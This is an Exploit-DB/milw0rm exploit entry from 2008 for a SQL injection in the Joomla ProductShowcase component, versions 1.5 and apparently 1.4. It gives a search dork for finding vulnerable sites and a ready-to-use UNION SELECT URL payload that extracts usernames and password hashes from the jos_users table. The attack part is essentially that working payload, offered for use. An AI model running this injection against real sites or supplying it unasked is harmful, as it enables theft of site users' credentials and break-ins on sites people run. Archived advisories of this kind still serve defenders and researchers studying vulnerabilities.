Joomla! Component ProductShowcase 1.5 - SQL Injection

EDB-ID:

5237

CVE:

N/A


Author:

S@BUN

Type:

webapps


Platform:

PHP

Date:

2008-03-11


##########################################
#
# Joomla Component com_productshowcase SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
####HOME : http://securityreason.com/search/101/c0BidW4=/1/0
#
####MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORKS 1 : allinurl :"com_productshowcase"
#
###########################################
EXPLOIT :

index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*


###########################################
##################S@BUN##################
###########################################
#####hackturkiye.hackturkiye@gmail.com#######
###########################################

	<name>ProductShowcase</name>
	<creationDate>10 July 2006</creationDate>
	<author>Numa Technologies Corporation</author>
	<copyright>Copyright ©2006 Numa Technolgies Corporation. All Rights Reserved Worldwide.</copyright>
	<authorEmail>scott@numacorp.com</authorEmail>

	<authorUrl>www.numacorp.com</authorUrl>
	<version>1.5</version>
	<description>A Simple Product Gallery.</description>

	<version>1.4</version> << as well.

# milw0rm.com [2008-03-11]